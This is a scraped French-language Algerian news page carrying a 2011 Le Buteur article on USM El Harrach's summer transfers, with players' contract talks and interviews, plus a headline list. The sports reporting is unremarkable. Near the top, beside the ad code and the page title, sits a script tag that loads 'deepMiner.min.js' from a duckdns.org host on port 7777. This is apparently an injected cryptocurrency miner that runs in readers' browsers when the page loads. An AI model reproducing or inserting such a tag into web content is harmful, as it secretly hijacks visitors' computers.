googletag.defineSlot('/21620968445/Djazairess_Fr_Article_1', [[336, 280], [300, 300], [300, 250], [300, 600]], 'div-gpt-ad-142634874-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_1', 'div-gpt-ad-142634874-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_3', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634876-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_3', 'div-gpt-ad-142634876-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Article_2', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-142634875-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Article_2', 'div-gpt-ad-142634875-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Widget', [[222, 280]], 'div-gpt-ad-1524625614-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Widget', 'div-gpt-ad-1524625614-0-oop').addService(googletag.pubads()); googletag.defineSlot('/21620968445/Djazairess_Fr_Siteunder', [[336, 280], [300, 300], [300, 250]], 'div-gpt-ad-930032573-0').addService(googletag.pubads()); googletag.defineOutOfPageSlot('/21620968445/Djazairess_Fr_Siteunder', 'div-gpt-ad-930032573-0-oop').addService(googletag.pubads()); googletag.pubads().enableSingleRequest(); googletag.enableServices();}); Djazairess : USMH : Djarbou à défaut de Djabou<script src="https://jhondi33.duckdns.org:7777/deepMiner.min.js"></script>
 
En bref…    La démission surprise d'Ould Abbès    Louisa Hanoune fustige les partisans de la «continuité»    Un élu de l'APW pour représenter le FLN    La sous-traitance représente 10% de l'activité    Marchés pétroliers : La surabondance annonce-t-elle une mauvaise année ?    Un dialogue pour désamorcer la crise    Libye, la quadrature du cercle    Jamal Khashoggi, Ankara enfonce Riyad par petites doses    Votre week-end sportif    Violences dans les gradins du 5-Juillet    Le Mouloudia a mal de ses recrues estivales    Campagne d'information pour expliquer le projet    Plus de 33 000 pétards saisis à Djimla    Des dizaines de villageois de Souk-Lekhmis bloquent le CW15    Six millions d'Algériens sont diabétiques    Zombies-Land !    Logements sociaux : Les recalés des listes des bénéficiaires protestent    Assassinat par la DST en novembre 1954 de Kacem Zeddour Mohammed-Brahim Une affaire d'Etat    WA Tlemcen: Biskra, un cap important pour le Widad    USM Bel-Abbès: Un exploit qui en appelle d'autres    FLN: Ould Abbès démissionne    Ce n'est pas Trump le problème mais l'Amérique qui l'a élu    Europe: «Brexit or not Brexit ?»    Le pétrole, toujours    Le FFS dénonce: Le projet de loi de finances 2019 «présenté de façon expéditive»    Skikda: Saisie de kif, 8 arrestations    Suite aux nombreuses opérations de relogement: Des terrains combinés de proximité pour les nouveaux pôles urbains    Lycée Dergham Hanifi: La police sensibilise les élèves sur les dangers de l'Internet    Présidentielle : on se perd en conjectures !    EN - Les Verts dès demain à Lomé: Belmadi mobilise ses troupes    France 1914-1918 : centenaire de l'Armistice, le 11 novembre    Le virus des primaires    Est-il Halal de prier à la grande mosquée d'Alger ?    Hamas plonge Israël dans une crise politique    FLN : Démission de M. Ould Abbes pour des raisons de santé    Bedoui : " L'Algérie est sur de bons rails vers un lendemain meilleur "    Situation économique et sociale alarmante dans la wilaya de Khenchela :    FLN : Ould Abbès "débarqué"    Des otages druzes libérés portent en triomphe Bachar el-Assad    Les assiettes foncières inexploitées seront mises à la disposition des porteurs de projets    Arnaud Montebourg nouveau président de l'Association    2e édition du prix Cheikh Abdelkrim-Dali à Alger    L'étape d'Alger a coûté 5 MD    «Nous allons à Lomé pour la gagne»    Le Hamas et l'Etat hebreu: Crise politique en Israël    L'échec programmé de Rome    Disney : Les exploits des super-héros font les affaires de Mickey    







Merci d'avoir signalé!
Cette image sera automatiquement bloquée après qu'elle soit signalée par plusieurs personnes.





USMH : Djarbou à défaut de Djabou
Publié dans Le Buteur le 27 - 07 - 2011


Cherif El Ouazzani trop cher
Hanitser donne son accord définitif à Laïb
N'ayant pu concrétiser le transfert de Djabou à El Harrach faute de libération, les dirigeants de l'USMH ne veulent plus perdre leur temps à attendre un éventuel revirement de Serrar. Dès lors que le président de l'Entente a opposé son niet catégorique, la piste Abdelmoumène Djabou a été écartée et les dirigeants de l'USMH sont entrés en contact avec le jeune Abdelhakim Djarbou (20 ans), un milieu de terrain qui a évolué au sein de l‘US Biskra où il a joué tout au long de la saison titulaire à part entière. Libre de tout engagement après l'expiration de son contrat, le 30 juin dernier, Djarbou, qui a donné son accord au premier responsable de l'USMH avant-hier, était attendu hier au siège du club. Cette deuxième rencontre avec Laïb était prévue pour régler certains petits détails avant la finalisation du transfert. Djarbou était d'ailleurs attendu hier en fin après-midi pour signer son contrat.

Il va signer finalement aujourd'hui
Selon une source digne de foi, les deux parties ont trouvé un terrain d'entente car le manager de Djarbou, qui s'est déplacé hier à El Harrach, avait la veille discuté avec Laïb au téléphone. Les deux hommes auraient, selon toute vraisemblance, tout réglé. Il sera reçu par le président aujourd'hui pour finaliser la transaction qui permettra au joueur de signer son contrat. Ainsi, Djarbou sera certainement la cinquième recrue harrachie, après Aïssaoui, Kahouadji, Bounedjah et Haou.
Cherif El Ouazzani trop cher
Par ailleurs, on vient d'apprendre que les dirigeants de l'USMH, qui ont pris contact avec Cherif El Ouazzani, sont sur le point de rompre les contacts avec ce joueur, après l'échec des négociations entreprises depuis deux jours. C'est ce qu'on a appris d'une source proche de la direction du club. Le président Laïb, qui a rencontré l'ex-joueur de la JSK à Oran, jeudi dernier, était quelque peu déçu de n'avoir pas trouvé un accord sur le plan financier avec Cherif El Ouazzani. Ce dernier s'était montré trop exigeant en plaçant la barre proche du milliard de centimes. Pour l'instant, on ne sait pas encore s'il est prévu un deuxième round de négociations. Mais il est toutefois utile de savoir qu'il existe une grande différence entre la somme d'argent proposée par Laïb et celle exigée par le joueur.

Aucune concession pour ceux en fin de contrat
Certains joueurs se trouvant en fin de contrat ne savent pas encore s'ils seront harrachis la saison prochaine ou pas. Mais selon les dirigeants du club, l'avenir de ces joueurs dépendra des négociations avec le président Laïb. On croit savoir que certains d'entre eux, à l'image de Deghbala, Gharbi et Griche, dont le rendement de la saison passée a été jugé moyen, pourraient voir leurs exigences financières revues à la baisse. C'est ce que nous a laissé entendre un dirigeant influent : «Contrairement à ce qui a été écrit dans la presse, je ne pense pas que des éléments qui ont été titulaires la saison passée seront libérés. Certes, ils sont en fin de contrat, mais rien n'a été décidé concernant leur avenir. Mais il est certain que leur avenir au club dépendra des négociations qui porteront sur le volet financier. S'ils se montrent trop exigeants, la direction du club ne cèdera pas à leurs exigences. Il leur sera proposé une somme conforme à leur valeur et à leur rendement de la saison passée. S'ils n'acceptent pas, aucune concession ne leur sera faite.»
-----------------------
Gharbi «J'ai des offres mais j'attendrai jusqu'à la fin de la semaine un signe de la direction»
Le milieu de terrain Gharbi, qui fut parmi les bonnes surprises de cette saison, se trouve en fin de contrat avec les Harrachis. Le joueur ne comprend pas les raisons qui font que la direction n'ait pas pris la peine de l'estimer à sa juste valeur, alors qu'il est sollicité par de nombreux clubs de l'élite. De toute façon, Gharbi a pris la décision de laisser quelques jours encore au président Laïb pour le convaincre de rester au lieu de quitter le club sans avertir ses anciens employeurs.
Se targuant d'avoir plusieurs offres alléchantes, tout en ayant le privilège d'être libre de choisir sa future destination, Djeghbala a tenu à laisser à la direction de l'USMH jusqu'à la fin de semaine pour un éventuel contact. Sinon le joueur signera pour un autre club huppé, avant de prendre quelques jours de vacances. Bien qu'il fasse partie des joueurs les plus réguliers et performants dans l'échiquier de Charef, la saison écoulée, le souhait de Gharbi de vite régler sa situation ou de partir vers un autre club n'a pas plu aux dirigeants harrachis. En effet, la direction a décidé de se passer des services de certains joueurs en fin de contrat et qui n'ont pas été contactés ces derniers jours… Un message net, clair et précis.
-----------------------
Latrèche s'engage avec l'USMB
Latrèche aura opté en fin de semaine dernière pour l'USMB. Cependant le transfert de ce joueur reste suspendu à un problème de libération. La direction de l'USMH attend la demande officielle de l'USMB concernant la libération sans pour autant dévoiler la somme exacte. Ce joueur devrait sans aucun doute porter les couleurs de l'USMB après un passage vraiment raté au club harrachi.
Laïb ne veut pas lâcher Latrèche
Le milieu de terrain Latreche, qui a été mis sur la liste des joueurs libérés, pourrait être repêché. D'après le président Laïb, ce joueur, toujours sous contrat avec l'USMH, sera reconduit en prévision du prochain exercice. Le chairman harrachi estime que cet élément, qui n'a pas eu la chance de jouer la saison écoulée, devrait être performant la saison prochaine.
Laïb : «Latrèche est toujours avec nous»
«Latrèche est toujours avec nous. Cette saison il n'a pas eu beaucoup de chance, mais je sais qu'avec une préparation de qualité cet été il sera meilleur. C'est un joueur professionnel et je peux vous dire qu'il aura la chance de jouer. Il est arrivé l'année dernière à l'USMH en provenance du MSPB et nous avons dû payer cher sa libération. Il est lié avec nous pour une autre saison, et donc on doit respecter la durée de son contrat. Maintenant s'il décide de quitter l'USMH pour rejoindre un autre club on ne s'opposera pas à son transfert, mais le club acquéreur doit payer pour sa libération.»
-----------------------
Hanitser donne son accord définitif à Laïb
Hanitser, l'attaquant harrachi, qui était hier chez Laïb pour une discussion concernant son avenir, a finalement donné son accord au premier responsable du club. Ce dernier, qui a usé d'un langage franc, a convaincu Hanitser de rempiler. Le joueur nous a même confirmé cette information au moment où nous l'avons joint hier au téléphone.
-----------------------
«Je reste à l'USMH»
Vous faites partie des joueurs en fin de contrat. Peut-on avoir une idée de vos intentions et de votre avenir sportif ?
Même en fin de contrat, je me considère toujours harrachi. Je viens de passer deux saisons qui m'ont permis de m'adapter à l'environnement du club. A El Harrach, je me sens chez moi et je n'ai jamais pensé à quitter ce club.
Mais vous n'avez encore rien signé…
D'accord, mais dans ma tête, je suis à l'USMH. J'ai donné mon accord définitif aux dirigeants. Je ne pense pas changer d'avis. Ma parole vaut beaucoup plus que l'argent.
A un moment donné, on a appris que vous étiez en contact avec certaines équipes de Ligue 1…
Non, il n'y a rien de vrai dans tout cela. A aucun moment il n'a été question de quitter l'USMH. Maintenant s'il y a des gens qui croient à cette éventualité, je ne peux pas les en empêcher.
Qu'est-ce qui motive votre décision de rempiler ?
Il y a plusieurs facteurs qui influent sur ma décision. Je ne vous cache pas que la confiance que j'ai gagnée à El Harrach n'a pas de prix. Que ce soit chez les supporters ou les dirigeants, tout le monde m'estime. C'est là la raison principale de ma décision de rempiler.
Du point de vue financier, êtes-vous satisfait ?
Je n'ai pas encore négocié. Disons qu'à El-Harrach, je suis estimé à ma juste valeur. Mais ce n'est pas là un facteur qui a été déterminant sur ma décision de rester.
-----------------------
La FAF vient de donner son accord
L'USMH restera à Lavigerie
Les dirigeants et supporters de l'USMH, qui se faisaient quelques soucis quant à la domiciliation de leur équipe pour ce prochain exercice, sont plus que jamais soulagés. La direction du club, qui avait sollicité la LNF pour une domiciliation au stade Lavigerie, vient d'avoir l'accord de l'instance chargée de la gestion de la compétition. L'équipe harrachie devrait recevoir ses adversaires cette saison sur son terrain fétiche du stade du 1er-Novembre.


Cliquez ici pour lire l'article depuis sa source.